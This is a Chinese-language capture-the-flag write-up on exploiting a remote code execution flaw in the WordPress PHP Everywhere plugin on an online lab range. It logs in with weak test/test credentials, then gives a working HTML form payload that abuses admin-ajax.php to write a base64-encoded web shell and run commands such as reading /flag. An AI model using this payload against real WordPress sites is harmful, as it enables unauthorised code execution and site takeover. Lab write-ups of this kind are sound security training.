简介

是wordpress远程代码执行漏洞，任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求，并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令。

本人使用春秋云境免费靶场在线搭建。

详解

1. 打开首页，随便点点也没有发现什么，都没有登录、注册等入口。

2. 使用dirsearch工具进行目录扫描。发现登录入口/wp-login.php和注册入口/wp-signup.php。但是不允许新用户注册
3. 提示弱口令，进行弱口令扫描。用户名密码都是test。
4. 登录到后台就好搞了。html插入form表单，然后提交

<form action="http://eci-2ze4sfovog5pgzhrpvut.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/shell.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUW3NoZWxsXSk7ID8+")); ?>[/php_everywhere]</textarea>
      <input type="submit" value="Execute" />
</form>

注意修改action请求域名。

5. 访问木马----https://eci-2ze4sfovog5pgzhrpvut.cloudeci1.ichunqiu.com/shell.php?shell=cat%20/flag获取flag。

结语

dirsearch工具是kali自带的工具，可以看这篇博客了解。